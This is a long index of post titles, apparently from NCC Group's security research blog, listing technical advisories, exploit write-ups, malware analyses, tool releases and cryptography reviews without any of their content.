Stepping Insyde System Management Mode
Breaking Pedersen Hashes in Practice
A Race to Report a TOCTOU: Analysis of a Bug Collision in Intel SMM
Making New Connections – Leveraging Cisco AnyConnect Client to Drop and Run Payloads
A Primer On Slowable Encoders
Threat Spotlight – Hydra
Rustproofing Linux (Part 4/4 Shared Memory)
Rustproofing Linux (Part 3/4 Integer Overflows)
Security Code Review With ChatGPT
Rustproofing Linux (Part 2/4 Race Conditions)
Readable Thrift
Building WiMap the Wi-Fi Mapping Drone
Building WiMap the Wi-Fi Mapping Drone
Fuzzing the Easy Way Using Zulu
Fuzzing the Easy Way Using Zulu
Exploiting CVE-2014-0282
Exploiting CVE-2014-0282
Rustproofing Linux (Part 1/4 Leaking Addresses)
Machine Learning 102: Attacking Facial Authentication with Poisoned Data
Threat Modelling Cloud Platform Services by Example: Google Cloud Storage
Using Semgrep with Jupyter Notebook files
Announcing NCC Group’s Cryptopals Guided Tour: Set 2
Technical Advisory – U-Boot – Unchecked Download Size and Direction in USB DFU (CVE-2022-2347)
Technical Advisory – Multiple Vulnerabilities in the Galaxy App Store (CVE-2023-21433, CVE-2023-21434)
Project Bishop: Clustering Web Pages
Puckungfu: A NETGEAR WAN Command Injection
MeshyJSON: A TP-Link tdpServer JSON Stack Overflow
Machine Learning 101: The Integrity of Image (Mis)Classification?
Replicating CVEs with KLEE
Public Report – VPN by Google One Security Assessment
Public Report – Confidential Space Security Review
Exploring Prompt Injection Attacks
Impersonating Gamers With GPT-2
So long and thanks for all the 0day
A jq255 Elliptic Curve Specification, and a Retrospective
Technical Advisory – NXP i.MX SDP_READ_DISABLE Fuse Bypass (CVE-2022-45163)
Tool Release – Web3 Decoder Burp Suite Extension
Tales of Windows detection opportunities for an implant framework
Check out our new Microcorruption challenges!
Toner Deaf – Printing your next persistence (Hexacon 2022)
Technical Advisory – OpenJDK – Weak Parsing Logic in java.net.InetAddress and Related Classes
Public Report – IOV Labs powHSM Security Assessment
Shining New Light on an Old ROM Vulnerability: Secure Boot Bypass via DCD and CSF Tampering on NXP i.MX Devices
A glimpse into the shadowy realm of a Chinese APT: detailed analysis of a ShadowPad intrusion
Detecting Mimikatz with Busylight
Whitepaper – Project Triforce: Run AFL On Everything (2017)
Tool Release – Project Kubescout: Adding Kubernetes Support to Scout Suite
Technical Advisory – Multiple Vulnerabilities in Juplink RX4-1800 WiFi Router (CVE-2022-37413, CVE-2022-37414)
A Guide to Improving Security Through Infrastructure-as-Code
Tool Release – ScoutSuite 5.12.0
Public Report – Penumbra Labs Decaf377 Implementation and Poseidon Parameter Selection Review
Tool Release – Monkey365
Sharkbot is back in Google Play
Constant-Time Data Processing At a Secret Offset, Privacy and QUIC
There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities
Conference Talks – September/October 2022
SETTLERS OF NETLINK: Exploiting a limited UAF in nf_tables (CVE-2022-32250)
Writing FreeBSD Kernel Modules in Rust
NCC Con Europe 2022 – Pwn2Own Austin Presentations
Tool Release – JWT-Reauth
Back in Black: Unlocking a LockBit 3.0 Ransomware Attack
Wheel of Fortune Outcome Prediction – Taking the Luck out of Gambling
Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study
Implementing the Castryck-Decru SIDH Key Recovery Attack in SageMath
Top of the Pops: Three common ransomware entry techniques
NCC Group Research at Black Hat USA 2022 and DEF CON 30
Tool Release – insject: A Linux Namespace Injector
Technical Advisory – Multiple vulnerabilities in Nuki smart locks (CVE-2022-32509, CVE-2022-32504, CVE-2022-32502, CVE-2022-32507, CVE-2022-32503, CVE-2022-32510, CVE-2022-32506, CVE-2022-32508, CVE-2022-32505)
NIST Selects Post-Quantum Algorithms for Standardization
Climbing Mount Everest: Black-Byte Bytes Back?
Five Essential Machine Learning Security Papers
Whitepaper – Practical Attacks on Machine Learning Systems
Flubot: the evolution of a notorious Android Banking Malware
A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would have prevented
Technical Advisory – ExpressLRS vulnerabilities allow for hijack of control link
Updated: Technical Advisory and Proofs of Concept – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552)
Understanding the Impact of Ransomware on Patient Outcomes – Do We Know Enough?
Public Report – Threshold ECDSA Cryptography Review
Exception Handling and Data Integrity in Salesforce
Technical Advisory – Multiple Vulnerabilities in Trendnet TEW-831DR WiFi Router (CVE-2022-30325, CVE-2022-30326, CVE-2022-30327, CVE-2022-30328, CVE-2022-30329)
Shining the Light on Black Basta
Technical Advisory – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552)
NCC Group’s Jeremy Boone recognized for Highest Quality and Most Eligible Reports through the Intel Circuit Breaker program
Conference Talks – June 2022
Hardware Security By Design: ESP32 Guidance
Public Report – Lantern and Replica Security Assessment
NCC Group’s Juan Garrido named to Microsoft’s MSRC Office Security Researcher Leaderboard
Technical Advisory – FUJITSU CentricStor Control Center <= V8.1 – Unauthenticated Command Injection ( CVE-2022-31794 and CVE-2022-31795)
Public Report – go-cose Security Assessment
Technical Advisory – SerComm h500s – Authenticated Remote Command Execution (CVE-2021-44080)
Metastealer – filling the Racoon void
earlyremoval, in the Conservatory, with the Wrench: Exploring Ghidra’s decompiler internals to make automatic P-Code analysis scripts
Tool Release – Ghostrings
Technical Advisory – Kwikset/Weiser BLE Proximity Authentication in Kevo Smart Locks Vulnerable to Relay Attacks
Technical Advisory – Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to Relay Attacks
Technical Advisory – BLE Proximity Authentication Vulnerable to Relay Attacks
Technical Advisory: Ruby on Rails – Possible XSS Vulnerability in ActionView tag helpers (CVE-2022-27777)
North Korea’s Lazarus: their initial access trade-craft using social media and social engineering
Adventures in the land of BumbleBee – a new malicious loader
LAPSUS$: Recent techniques, tactics and procedures
Real World Cryptography Conference 2022
Mitigating the top 10 security threats to GCP using the CIS Google Cloud Platform Foundation Benchmark
A brief look at Windows telemetry: CIT aka Customer Interaction Tracker
Public Report – Google Enterprise API Security Assessment
Conti-nuation: methods and techniques observed in operations post the leaks
Whitepaper – Double Fetch Vulnerabilities in C and C++
Mining data from Cobalt Strike beacons
Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23121)
Tool Release – ScoutSuite 5.11.0
Technical Advisory – Apple macOS XAR – Arbitrary File Write (CVE-2022-22582)
Microsoft announces the WMIC command is being retired, Long Live PowerShell
SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store
Estimating the Bit Security of Pairing-Friendly Curves
Detecting anomalous Vectored Exception Handlers on Windows
BrokenPrint: A Netgear stack overflow
Public Report – O(1) Labs Mina Client SDK, Signature Library and Base Components Cryptography and Implementation Review
Testing Infrastructure-as-Code Using Dynamic Tooling
10 real-world stories of how we’ve compromised CI/CD pipelines
NCC Group’s 2021 Annual Research Report
On the malicious use of large language models like GPT-3
Technical Advisory – Lenovo ImController Local Privilege Escalation (CVE-2021-3922, CVE-2021-3969)
Choosing the Right MCU for Your Embedded Device — Desired Security Features of Microcontrollers
FPGAs: Security Through Obscurity?
Public Report – WhatsApp opaque-ke Cryptographic Implementation Review
log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228
Log4Shell: Reconnaissance and post exploitation network detection
Announcing NCC Group’s Cryptopals Guided Tour!
Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Arbitrary File Deletion
Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Stored XSS
Technical Advisory – SonicWall SMA 100 Series – Multiple Unauthenticated Heap-based and Stack-based Buffer Overflow (CVE-2021-20045)
Technical Advisory – SonicWall SMA 100 Series – Post-Authentication Remote Command Execution (CVE-2021-20044)
Technical Advisory – SonicWall SMA 100 Series – Heap-Based Buffer Overflow (CVE-2021-20043)
Technical Advisory – SonicWall SMA 100 Series – Unauthenticated File Upload Path Traversal (CVE-2021-20040)
Why IoT Security Matters
Technical Advisory – Authenticated SQL Injection in SOAP Request in Broadcom CA Network Flow Analysis (CVE-2021-44050)
Encryption Does Not Equal Invisibility – Detecting Anomalous TLS Certificates with the Half-Space-Trees Algorithm
Tracking a P2P network related to TA505
Conference Talks – December 2021
Public Report – Zendoo Proof Verifier Cryptography Review
An Illustrated Guide to Elliptic Curve Cryptography Validation
Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks
POC2021 – Pwning the Windows 10 Kernel with NTFS and WNF Slides
Technical Advisory – Multiple Vulnerabilities in Victure WR1200 WiFi Router (CVE-2021-43282, CVE-2021-43283, CVE-2021-43284)
“We wait, because we know you.” Inside the ransomware negotiation economics.
Detection Engineering for Kubernetes clusters
Vaccine Misinformation Part 1: Misinformation Attacks as a Cyber Kill Chain
Technical Advisory – Arbitrary Signature Forgery in Stark Bank ECDSA Libraries (CVE-2021-43572, CVE-2021-43570, CVE-2021-43569, CVE-2021-43568, CVE-2021-43571)
TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial access
Public Report – Zcash NU5 Cryptography Review
The Next C Language Standard (C23)
Conference Talks – November 2021
Technical Advisory – Apple XAR – Arbitrary File Write (CVE-2021-30833)
Public Report – WhatsApp End-to-End Encrypted Backups Security Assessment
Cracking RDP NLA Supplied Credentials for Threat Intelligence
Detecting and Protecting when Remote Desktop Protocol (RDP) is open to the Internet
Enterprise-scale seamless onboarding and deployment of Azure Sentinel using Lighthouse for multi-tenant environments
Cracking Random Number Generators using Machine Learning – Part 2: Mersenne Twister
Cracking Random Number Generators using Machine Learning – Part 1: xorshift128
NCC Group placed first in global 5G Cyber Security Hack competition
Paradoxical Compression with Verifiable Delay Functions
A Look At Some Real-World Obfuscation Techniques
SnapMC skips ransomware, steals data
The Challenges of Fuzzing 5G Protocols
Reverse engineering and decrypting CyberArk vault credential files
Technical Advisory – Open5GS Stack Buffer Overflow During PFCP Session Establishment on UPF (CVE-2021-41794)
Assessing the security and privacy of Vaccine Passports
Technical Advisory – NULL Pointer Derefence in McAfee Drive Encryption (CVE-2021-23893)
Conference Talks – October 2021
Technical Advisory – Garuda Linux Insecure User Creation (CVE-2021-3784)
Detecting and Hunting for the PetitPotam NTLM Relay Attack
Technical Advisory: PDFTron JavaScript URLs Allowed in WebViewer UI (CVE-2021-39307)
Optimizing Pairing-Based Cryptography: Montgomery Multiplication in Assembly
CertPortal: Building Self-Service Secure S/MIME Provisioning Portal
NSA & CISA Kubernetes Security Guidance – A Critical Review
Technical Advisory – New York State Excelsior Pass Vaccine Passport Credential Forgery
Technical Advisory – New York State Excelsior Pass Vaccine Passport Scanner App Sends Data to a Third Party not Specified in Privacy Policy
Conference Talks – September 2021
The ABCs of NFC chip security
CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2
Disabling Office Macros to Reduce Malware Infections
Some Musings on Common (eBPF) Linux Tracing Bugs
Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Archive Extraction – CVE-2021-22937 (Patch Bypass)
Technical Advisory – Sunhillo SureLine Unauthenticated OS Command Injection (CVE-2021-36380)
Practical Considerations of Right-to-Repair Legislation
Technical Advisory – ICTFAX 7-4 – Indirect Object Reference
Technical Advisory: Stored and Reflected XSS Vulnerability in Nagios Log Server (CVE-2021-35478,CVE-2021-35479)
Detecting and Hunting for the Malicious NetFilter Driver
CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1
NCC Group Research at Black Hat USA 2021 and DEF CON 29
Alternative Approaches for Fault Injection Countermeasures (Part 3/3)
Software-Based Fault Injection Countermeasures (Part 2/3)
An Introduction to Fault Injection (Part 1/3)
Technical Advisory – Arbitrary File Read in Dell Wyse Management Suite (CVE-2021-21586, CVE-2021-21587)
Exploiting the Sudo Baron Samedit vulnerability (CVE-2021-3156) on VMWare vCenter Server 7.0
Technical Advisory – Shop app sends pasteboard data to Shopify’s servers
Tool Release – Reliably-checked String Library Binding
Are you oversharing (in Salesforce)? Our new tool could sniff it out!
Exploit mitigations: keeping up with evolving and complex software/hardware
NCC Group co-signs the Electronic Frontier Foundation’s Statement on DMCA Use Against Security Researchers
Handy guide to a new Fivehands ransomware variant
On the Use of Pedersen Commitments for Confidential Payments
Incremental Machine Learning by Example: Detecting Suspicious Activity with Zeek Data Streams, River, and JA3 Hashes
Testing Two-Factor Authentication
Optimizing Pairing-Based Cryptography: Montgomery Arithmetic in Rust
Research Paper – Machine Learning for Static Malware Analysis, with University College London
Conference Talks – June 2021
Public Report – Protocol Labs Groth16 Proof Aggregation: Cryptography and Implementation Review
iOS User Enrollment and Trusted Certificates
Detecting Rclone – An Effective Tool for Exfiltration
Supply Chain Security Begins with Secure Software Development
Toxic Tokens: Using UUIDs for Authorization is Dangerous (even if they’re cryptographically random)
Public Report – Dell Secured Component Verification
RM3 – Curiosities of the wildest banking malware
Conference Talks – May 2021
A Census of Deployed Pulse Connect Secure (PCS) Versions
NCC Group’s Upcoming Trainings at Black Hat USA 2021
Public Report – VPN by Google One: Technical Security & Privacy Assessment
Technical Advisory – ParcelTrack sends all pasteboard data to ParcelTrack’s servers on startup
Tool Release – Principal Mapper v1.1.0 Update
SAML XML Injection
The Future of C Code Review
RIFT: Detection capabilities for recent F5 BIG-IP/BIG-IQ iControl REST API vulnerabilities CVE-2021-22986
Tool Release – Solitude: A privacy analysis tool
Deception Engineering: exploring the use of Windows Installer Packages against first stage payloads
Lending a hand to the community – Covenant v0.7 Updates
Technical Advisory: Dell SupportAssist Local Privilege Escalation (CVE-2021-21518)
Technical Advisory – Multiple Vulnerabilities in Netgear ProSAFE Plus JGS516PE / GS116Ev2 Switches
Deception Engineering: exploring the use of Windows Service Canaries against ransomware
Wubes: Leveraging the Windows 10 Sandbox for Arbitrary Processes
Technical Advisory: Administrative Passcode Recovery and Authenticated Remote Buffer Overflow Vulnerabilities in Gigaset DX600A Handset (CVE-2021-25309, CVE-2021-25306)
Cryptopals: Exploiting CBC Padding Oracles
Investigating Potential Security Vulnerability Manifestation through Various Analyses & Inferences Regarding Internet RFCs (and how RFC Security might be Improved)
NCC Group’s 2020 Annual Research Report
Conference Talks – February/March 2021
Software Verification and Analysis Using Z3
Technical Advisory – Linksys WRT160NL – Authenticated Command Injection (CVE-2021-25310)
Real World Cryptography Conference 2021: A Virtual Experience
RIFT: Analysing a Lazarus Shellcode Execution Method
MSSQL Lateral Movement
Public Report – BLST Cryptographic Implementation Review
Sign over Your Hashes – Stealing NetNTLM Hashes via Outlook Signatures
Abusing cloud services to fly under the radar
Building an RDP Credential Catcher for Threat Intelligence
Double-odd Elliptic Curves
Using AWS and Azure for Cost Effective Log Ingestion with Data Processing Pipelines for SIEMs
Domestic IoT Nightmares: Smart Doorbells
Technical Advisory: OS Command Injection in Silver Peak EdgeConnect Appliances (CVE-2020-12148, CVE-2020-12149)
Helping Engineering Teams Tackle Security Debt in Embedded Systems: U-Boot Configuration Auditing Introduced in Depthcharge v0.2.0
An Adventure in Contingency Debugging: Ruby IO#read/IO#write Considered Harmful
ABSTRACT SHIMMER (CVE-2020-15257): Host Networking is root-Equivalent, Again
Tool Release – HTTPSignatures: A Burp Suite Extension Implementing HTTP Signatures
ICS/OT Security & the evolution of the Purdue Model: Integrating Industrial and Business Networks
Tool Release – Carnivore: Microsoft External Assessment Tool
Technical Advisory: containerd – containerd-shim API Exposed to Host Network Containers (CVE-2020-15257)
Conference Talks – December 2020
TA505: A Brief History Of Their Time
Decrypting OpenSSH sessions for fun and profit
Past, Present and Future of Effective C
Technical Advisory: SQL Injection and Reflected Cross-Site Scripting (XSS) Vulnerabilities in Oracle Communications Diameter Signaling Router (CVE-2020-14787, CVE-2020-14788)
Technical Advisory: Command Injection
Conference Talks – November 2020
Technical Advisory: Pulse Connect Secure – Arbitrary File Read via Logon Message (CVE-2020-8255)
Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Gzip Extraction (CVE-2020-8260)
Technical Advisory – Jitsi Meet Electron – Arbitrary Client Remote Code Execution (CVE-2020-27162)
Technical Advisory – Jitsi Meet Electron – Limited Certificate Validation Bypass (CVE-2020-27161)
Public Report – Filecoin Bellman and BLS Signatures Cryptographic Review
Technical Advisory – Linksys WRT160NL – Authenticated Remote Buffer Overflow (CVE-2020-26561)
There’s A Hole In Your SoC: Glitching The MediaTek BootROM
RIFT: F5 CVE-2020-5902 and Citrix CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 honeypot data release
Technical Advisory – Pulse Connect Secure – RCE via Template Injection (CVE-2020-8243)
Tool – Windows Executable Memory Page Delta Reporter
Salesforce Security with Remote Working
Tool Release – ScoutSuite 5.10
Conference Talks – October 2020
Tool Release – ICPin, an integrity-check and anti-debug detection pintool
Faster Modular Inversion and Legendre Symbol, and an X25519 Speed Record
Technical Advisory – Lansweeper Privilege Escalation via CSRF Using HTTP Method Interchange (CVE-2020-13658)
Online Casino Roulette – A guideline for penetration testers and security researchers
Extending a Thinkst Canary to become an interactive honeypot
StreamDivert: Relaying (specific) network connections
Public Report – Electric Coin Company NU4 Cryptographic Specification and Implementation Review
Machine learning from idea to reality: a PowerShell case study
Conference Talks – September 2020
Whitepaper – Exploring the Security of KaiOS Mobile Applications
Technical Advisory – wolfSSL TLS 1.3 Client Man-in-the-Middle Attack (CVE-2020-24613)
Technical Advisory – Multiple HTML Injection Vulnerabilities in KaiOS Pre-installed Mobile Applications
Technical Advisory – FreePBX – Multiple Authenticated SQL Injections in UCP application
Immortalising 20 Years of Epic Research
Pairing over BLS12-381, Part 3: Pairing!
Public Report – Pixel 4/4XL and Pixel 4a ioXt Audit
NCC Group researchers named amongst MSRC’s Most Valuable Security Researchers in 2020
Lights, Camera, HACKED! An insight into the world of popular IP Cameras
Conference Talks – August 2020
Tool Release – Winstrument: An Instrumentation Framework for Windows Application Assessments
Tool Release: Sinking U-Boots with Depthcharge
Technical Advisory: Heartbleed chained with a Pass-the-Hash attack leads to device compromise on TP-Link C200 IP Camera
Public Report – Qredo Apache Milagro MPC Cryptographic Assessment
Pairing over BLS12-381, Part 2: Curves
Understanding the root cause of F5 Networks K52145254: TMUI RCE vulnerability CVE-2020-5902
RIFT: Citrix ADC Vulnerabilities CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 Intelligence
An offensive guide to the Authorization Code grant
Technical Advisory – KwikTag Web Admin Authentication Bypass
Pairing over BLS12-381, Part 1: Fields
RIFT: F5 Networks K52145254: TMUI RCE vulnerability CVE-2020-5902 Intelligence
Experiments in Extending Thinkst Canary – Part 1
Tool Release – ScoutSuite 5.9.0
Technical Advisory – macOS Installer Local Root Privilege Escalation (CVE-2020-9817)
Paper: Thematic for Success in Real-World Offensive Cyber Operations – How to make threat actors work harder and fail more often
How-to: Importing WStalker CSV (and more) into Burp Suite via Import to Sitemap Extension
Tool: WStalker – an easy proxy to support Web API assessments
Security Considerations of zk-SNARK Parameter Multi-Party Computation
WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group
Tool Release – Socks Over RDP Now Works With Citrix
Striking Back at Retired Cobalt Strike: A look at a legacy vulnerability
Technical Advisory – ARM MbedOS USB Mass Storage Driver Memory Corruption
Cyber Security of New Space Paper
In-depth analysis of the new Team9 malware family
Common Insecure Practices with Configuring and Extending Salesforce
Exploring DeepFake Capabilities & Mitigation Strategies with University College London
Game Security
Exploring macOS Calendar Alerts: Part 2 – Exfiltrating data (CVE-2020-3882)
Research Report – Zephyr and MCUboot Security Assessment
CVE-2018-8611 Exploiting Windows KTM Part 5/5 – Vulnerability detection and a better read/write primitive
CVE-2018-8611 Exploiting Windows KTM Part 4/5 – From race win to kernel read and write primitive
Using SharePoint as a Phishing Platform
Public Report – Coda Cryptographic Review
Shell Arithmetic Expansion and Evaluation Abuse
CVE-2018-8611 Exploiting Windows KTM Part 3/5 – Triggering the race condition and debugging tricks
Tool Release – Socks Over RDP
Exploring macOS Calendar Alerts: Part 1 – Attempting to execute code
CVE-2018-8611 Exploiting Windows KTM Part 2/5 – Patch analysis and basic triggering
Practical Machine Learning for Random (Filename) Detection
Curve9767 and Fast Signature Verification
CVE-2018-8611 Exploiting Windows KTM Part 1/5 – Introduction
The Extended AWS Security Ramp-Up Guide
Code Patterns for API Authorization: Designing for Security
Order Details Screens and PII
How cryptography is used to monitor the spread of COVID-19
Rise of the Sensors: Securing LoRaWAN Networks
C Language Standards Update – Zero-size Reallocations are Undefined Behavior
IETF Draft: Indicators of Compromise and Their Role in Attack and Defen[c|s]e
Exploring Verifiable Random Functions in Code
Crave the Data: Statistics from 1,300 Phishing Campaigns
Impact of DNS over HTTPS (DoH) on DNS Rebinding Attacks
Tool Release – ScoutSuite 5.8.0
Whitepaper – Coinbugs: Enumerating Common Blockchain Implementation-Level Vulnerabilities
Smart Contracts Inside SGX Enclaves: Common Security Bug Patterns
LDAPFragger: Bypassing network restrictions using LDAP attributes
Threat Actors: exploiting the pandemic
A Survey of Istio’s Network Security Features
Conference Talks – March 2020
Public Report – RustCrypto AES/GCM and ChaCha20+Poly1305 Implementation Review
Reviewing Verifiable Random Functions
CVE-2018-8611 – Diving into the Windows Kernel Transaction Manager (KTM) for fun and exploitation
Whitepaper – Microcontroller Readback Protection: Bypasses and Defenses
Improving Software Security through C Language Standards
Whitepaper – A Tour of Curve 25519 in Erlang
Deep Dive into Real-World Kubernetes Threats
Technical Advisory – playSMS Pre-Authentication Remote Code Execution (CVE-2020-8644)
Interfaces.d to RCE
Properly Signed Certificates on CPE Devices
Conference Talks – February 2020
Tool Release – Collaborator++
Public Report – Electric Coin Company NU3 Specification and Blossom Implementation Audit
Tool Release – Enumerating Docker Registries with go-pillage-registries
Conference Talks – January 2020
Passive Decryption of Ethereum Peer-to-Peer Traffic
On Linux’s Random Number Generation
Demystifying AWS’ AssumeRole and sts:ExternalId
Welcome to the new NCC Group Global Research blog
Technical Advisory: Gaining root access on Sumpple S610 IP Camera via Telnet; and Unprotected client and server data transmission between Android and IOS clients
Security impact of IoT on the Enterprise
Secure Device Provisioning Best Practices: Heavy Truck Edition
CVE-2019-1405 and CVE-2019-1322 – Elevation to SYSTEM via the UPnP Device Host Service and the Update Orchestrator Service
Padding the struct: How a compiler optimization can disclose stack memory
Embedded Device Security Certifications
An Introduction to Ultrasound Security Research
PhanTap (Phantom Tap): Making networks spookier one packet at a time
An Introduction to Quantum Computing for Security Professionals
Sniffle: A Sniffer for Bluetooth 5
Compromising a Hospital Network for £118 (Plus Postage & Packaging)
Getting Shell with XAMLX Files
Kerberos Resource-Based Constrained Delegation: When an Image Change Leads to a Privilege Escalation
Technical Advisory: CyberArk EPM Non-paged Pool Buffer Overflow
Technical Advisory: Unauthenticated SQL Injection in Lansweeper
Jenkins Plugins and Core Technical Summary Advisory
Technical Advisory: Multiple Vulnerabilities in Ricoh Printers
Technical Advisory: Multiple Vulnerabilities in Brother Printers
Technical Advisory: Multiple Vulnerabilities in Xerox Printers
Technical Advisory: Multiple Vulnerabilities in Kyocera Printers
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 10: Efficacy Demonstration, Project Conclusion and Next Steps
Technical Advisory: Multiple Vulnerabilities in HP Printers
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 9: Adventures with Expert Systems
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 8: Development of Prototype #4 – Building on Takaesu’s Approach with Focus on XSS
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 7: Development of Prototype #3 – Adventures in Anomaly Detection
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 6: Development of Prototype #2 – Creating a SQLi PoC
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 5: Development of Prototype #1 – Text Processing and Semantic Relationships
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 4: Architecture and Design
Technical Advisory – Authorization Bypass Allows for Pinboard Corruption
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 3: Understanding Existing Approaches and Attempts
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 2: Going off on a Tangent – AI/ML Applications in Social Engineering
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 1: Understanding the Basics and What Platforms and Frameworks Are Available
Technical Advisory: Multiple Vulnerabilities in Lexmark Printers
Technical Advisory: Intel Driver Support & Assistance – Local Privilege Escalation
Technical Advisory: Citrix Workspace / Receiver Remote Code Execution Vulnerability
The Sorry State of Aftermarket Head Unit Security
Cyber Security in UK Agriculture
NCC Group Connected Health Whitepaper July 2019
Story of a Hundred Vulnerable Jenkins Plugins
Whitepaper – Hardware-Backed Heist: Extracting ECDSA Keys from Qualcomm’s TrustZone
Technical Advisory: Multiple Vulnerabilities in SmarterMail
Technical Advisory – DelTek Vision – Arbitrary SQL Execution (SQLi)
eBPF Adventures: Fiddling with the Linux Kernel and Unix Domain Sockets
Chafer backdoor analysis
Finding and Exploiting .NET Remoting over HTTP using Deserialisation
Technical Advisory: Multiple Vulnerabilities in MailEnable
Assessing Unikernel Security
Technical Advisory: IP Office Stored Cross Site Scripting (XSS) Vulnerability
Zcash Overwinter Consensus and Sapling Cryptography Review
Xendbg: A Full-Featured Debugger for the Xen Hypervisor
Use of Deserialisation in .NET Framework Methods and Classes
Owning the Virgin Media Hub 3.0: The perfect place for a backdoor
Nine years of bugs at NCC Group
The 9 Lives of Bleichenbacher’s CAT: New Cache ATtacks on TLS Implementations
Third party assurance
Turla PNG Dropper is back
Public cloud
Android Cloud Backup/Restore
Spectre on a Television
RokRat Analysis
Technical Advisory: SMB Hash Hijacking and User Tracking in MS Outlook
Technical Advisory: Authentication Bypass in libSSH
Securing Google Cloud Platform – Ten best practices
Public Report – Android Cloud Backup/Restore
Much Ado About Hardware Implants
NCC Group’s Exploit Development Capability: Why and What
Technical Advisory: Bypassing Workflows Protection Mechanisms – Remote Code Execution on SharePoint
Technical Advisory: Mosquitto Broker DoS through a Memory Leak vulnerability
Improving Your Embedded Linux Security Posture With Yocto
How I did not get a shell
Technical Advisory: Mitel MiVoice 5330e Memory Corruption Flaw
Singularity of Origin
Proxy Re-Encryption Protocol: IronCore Public Report
Technical Advisory: Bypassing Microsoft XOML Workflows Protection Mechanisms using Deserialisation of Untrusted Data
Celebrating NCC Con Europe 2018
The disadvantages of a blacklist-based approach to input validation
Securing Teradata Database
Technical Advisory: Unauthenticated Remote Command Execution through Multiple Vulnerabilities in Virgin Media Hub 3.0
Ethics in Security Testing
Freddy: An extension for automatically identifying deserialisation issues in Java and .NET applications
Sobelow Update
House
Principal Mapper (pmapper)
Return of the hidden number problem
Technical advisory: “ROHNP”- key extraction side channel in multiple crypto libraries
CVE-2017-8570 RTF and the Sisfader RAT
Mallory: Transparent TCP and UDP Proxy
Mallory and Me: Setting up a Mobile Mallory Gateway
CyberVillainsCA
DECTbeacon
Fuzzbox
Gizmo
HTTP Profiler
Intent Sniffer
Intent Fuzzer
iSEC Partners Releases SSLyze
Jailbreak
Manifest Explorer
Package Play
ProxMon
pySimReader
SAML Pummel
SecureBigIP
SecureCisco
SecureCookies
SecureIE.ActiveX
WebRATS
AWS Inventory: A tool for mapping AWS resources
Extractor
CMakerer: A small tool to aid CLion’s indexing
Emissary Panda – A potential new malicious tool
SMB hash hijacking & user tracking in MS Outlook
Testing HTTP/2 only web services
Windows IPC Fuzzing Tools
WSBang
WSMap
Nerve
Ragweed
File Fuzzers
Kivlad
Android SSL Bypass
Hiccupy
iOS SSL Killswitch
The SSL Conservatory
TLSPretense — SSL/TLS Client Testing Framework
tcpprox
YoNTMA
Tattler
PeachFarmer
Android-KillPermAndSigChecks
Android-OpenDebug
Android-SSL-TrustKiller
Introspy for Android
RtspFuzzer
SSLyze v0.8
NCLoader
IG Learner Walkthrough
Forensic Fuzzing Tools
Security First Umbrella
Autochrome
WSSiP: A Websocket Manipulation Proxy
AssetHook
Call Map: A Tool for Navigating Call Graphs in Python
Sobelow: Static analysis for the Phoenix Framework
G-Scout
Decoder Improved Burp Suite Plugin
Python Class Informer: an IDAPython plugin for viewing run-time type information (RTTI)
AutoRepeater: Automated HTTP Request Repeating With Burp Suite
TPM Genie
Open Banking: Security considerations & potential risks
scenester
port-scan-automation
Windows DACL Enum Project
Shocker
whitebox
vlan-hopping
tybocer
xcavator
WindowsJobLock
Azucar
Introducing Azucar
Readable Thrift
Decoding network data from a Gh0st RAT variant
Technical Advisory: Multiple Vulnerabilities in ManageEngine Desktop Central
Discovering Smart Contract Vulnerabilities with GOATCasino
BLEBoy
APT15 is Alive and Strong: An Analysis of RoyalCli and RoyalDNS
TPM Genie: Interposer Attacks Against the Trusted Platform Module Serial Bus
Technical Advisory: Code Execution by Unsafe Resource Handling in Multiple Microsoft Products
Technical Advisory: Code Execution by Viewing Resource Files in .NET Reflector
Technical Advisory: Reflected Cross-Site Scripting (XSS) vulnerability in Jenkins Delivery Pipeline plugin
Spectre and Meltdown: What you Need to Know
The economics of defensive security
HIDDEN COBRA Volgmer: A Technical Analysis
Integrity destroying malicious code for financial or geopolitical gain: A vision of the future?
Kubernetes Security: Consider Your Threat Model
Mobile & web browser credential management: Security implications, attack cases & mitigations
SOC maturity & capability
Automated Reverse Engineering of Relationships Between Data Structures in C++ Binaries
Pointer Sequence Reverser (PSR)
Cisco ASA series part eight: Exploiting the CVE-2016-1287 heap overflow over IKEv1
Bypassing Android’s Network Security Configuration
Technical Advisory – Bomgar Remote Support – Local Privilege Escalation
Cisco ASA series part seven: Checkheaps
Adversarial Machine Learning: Approaches & defences
eBook: Breach notification under GDPR – How to communicate a personal data breach
Cisco ASA series part six: Cisco ASA mempools
The Update Framework (TUF) Security Assessment
Cisco ASA series part five: libptmalloc gdb plugin
Technical Advisory: Adobe ColdFusion RMI Registry.bind() Deserialisation RCE
Technical Advisory: Adobe ColdFusion Object Deserialisation RCE
